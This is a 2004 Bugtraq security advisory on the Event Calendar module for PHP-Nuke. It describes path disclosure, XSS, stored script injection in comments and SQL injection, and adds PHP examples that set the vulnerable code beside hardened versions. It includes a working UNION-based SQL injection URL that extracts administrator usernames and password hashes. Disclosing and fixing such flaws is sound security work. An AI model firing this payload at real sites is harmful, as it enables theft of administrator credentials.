List: bugtraq
Subject: [waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar
From: Janek Vind <come2waraxe () yahoo ! com>
Date: 2004-11-16 23:04:21
Message-ID: 20041117042243.23012.qmail () www ! securityfocus ! com
{================================================================================}
{ [waraxe-2004-SA#038] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in Event Calendar module for PhpNuke ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton. Development continued by Holbrookau.
Author's Email: phpnuke@holbrookau.net
Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much updated and features many improvements and add-ons. For example, the administration area features configuration via a graphical interface, posting of events can be moderated, and users even have the option of adding comments to any event.
Homepage: http://phpnuke.holbrookau.net/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This piece of software has many security-related flaws due to poor handling of user-submitted data.
A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A1 - full path disclosure in "config.php":
http://localhost/nuke73/modules/Calendar/config.php
Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
A2, A3 - full path disclosure in "index.php" and "submit.php":
http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php
B - XSS aka cross site scripting:
Examples:
http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss code here]
C - script injection in calendar event comments:
This is a serious bug: anyone can insert JavaScript into event comments, and when a user or admin reads the comment, the script runs and bad things can happen, such as cookie theft or arbitrary admin operations.
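The reflected (B) and stored (C) cases share one root cause and one fix: parameters are echoed back into HTML without validation or encoding. The following is an added illustration, not the Event Calendar module's own code; the parameter names come from the advisory's URLs, while the allowed values for `type` and the comment handling are assumptions.

```php
<?php
// Added illustrative example, not the Event Calendar module's own code.
// $_GET names (type, day, month, year) come from the advisory's URLs; the
// allow-list for 'type' is an assumption made for this example.

// Vulnerable pattern: a preview page that echoes request parameters verbatim,
// so any markup in 'type', 'day', 'month' or 'year' reaches the browser as-is.
function preview_vulnerable(array $params): string
{
    return '<b>Type:</b> ' . $params['type']
         . ' <b>Date:</b> ' . $params['day'] . '/' . $params['month'] . '/' . $params['year'];
}

// Hardened: strict allow-list for 'type', integer coercion plus a real date check,
// and HTML escaping of anything that is still echoed back.
function preview_hardened(array $params): string
{
    $allowed_types = array('view', 'submit', 'preview');   // assumed allow-list
    $type = isset($params['type']) && in_array($params['type'], $allowed_types, true)
          ? $params['type'] : 'view';

    $day   = isset($params['day'])   ? (int) $params['day']   : 0;
    $month = isset($params['month']) ? (int) $params['month'] : 0;
    $year  = isset($params['year'])  ? (int) $params['year']  : 0;
    if (!checkdate($month, $day, $year)) {          // signature is (month, day, year)
        return 'Invalid date';
    }
    return '<b>Type:</b> ' . htmlspecialchars($type, ENT_QUOTES, 'UTF-8')
         . ' <b>Date:</b> ' . $day . '/' . $month . '/' . $year;
}

// Stored script injection (section C): the same encoding applies when a comment
// is rendered; the database may keep the raw text, but the browser never sees it raw.
function render_comment(string $stored_comment): string
{
    return '<p>' . htmlspecialchars($stored_comment, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Constructed sample input showing the difference between the two code paths.
$sample = array('type' => '<script>alert(1)</script>', 'day' => '17', 'month' => '11', 'year' => '2004');
echo preview_vulnerable($sample), "\n";  // the <script> element is emitted unchanged
echo preview_hardened($sample), "\n";    // type falls back to 'view'; date is numeric only
echo render_comment('<script>alert(1)</script>'), "\n"; // emitted as &lt;script&gt;...
```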
D - critical sql injection bugs in code:
A deeper look at the source code reveals multiple SQL queries in which some variables, mostly "$eid" and "$cid", are NOT surrounded with single quotes, so SQL injection is possible. Further exploitation depends on the database software and version. With MySQL 4.x and UNION functionality enabled, arbitrary data can be retrieved from the database, including admin(s) authentication credentials. As is tradition, there is a proof of concept:
----------------[ real life exploit ]---------------
http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1
----------------[/real life exploit ]---------------
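The unquoted-integer pattern the advisory describes, beside the two fixes a maintainer would apply, as an added example that is not the module's own code. The table and column names (`nuke_events`, `eid`, `title`) are assumptions; only the `$eid` parameter name comes from the advisory.

```php
<?php
// Added illustrative example, not the Event Calendar module's own code.
// Table/column names nuke_events, eid and title are assumptions for this example.

// Vulnerable pattern from the advisory: $eid is interpolated into the SQL text
// without quotes or validation, so non-numeric input becomes part of the statement.
function event_query_vulnerable(string $eid): string
{
    return "SELECT title FROM nuke_events WHERE eid=$eid";
}

// Minimal fix for the original PHP 4 / mysql_* style code: coerce to integer first.
// "-99 UNION ..." becomes -99, "abc" becomes 0; no SQL text can survive the cast.
function event_query_intcast(string $eid): string
{
    $eid = (int) $eid;
    return "SELECT title FROM nuke_events WHERE eid=$eid";
}

// Preferred fix: reject anything that is not an unsigned integer, then bind the
// value as a parameter so it never touches the SQL text at all.
function fetch_event_title(mysqli $db, string $eid): ?string
{
    if (!ctype_digit($eid)) {
        return null;
    }
    $id   = (int) $eid;
    $stmt = $db->prepare('SELECT title FROM nuke_events WHERE eid = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($title);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $title : null;
}

// Constructed input with the shape of the advisory's payload (payload body elided).
$input = '-99 UNION ALL SELECT ...';
echo event_query_vulnerable($input), "\n"; // WHERE eid=-99 UNION ALL SELECT ...
echo event_query_intcast($input), "\n";    // WHERE eid=-99
```

Note that `$cid`, named in the advisory alongside `$eid`, needs the same treatment wherever it reaches a query.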
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004
Since then there has been no further response from the software developer, and the downloadable version is still unpatched.
For help with patching look @ here - http://www.waraxe.us/forums.html
Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - http://base64-encoder-online.waraxe.us/base64/base64-encoder.php
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!
Tervitused - Heintz ja Maku!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------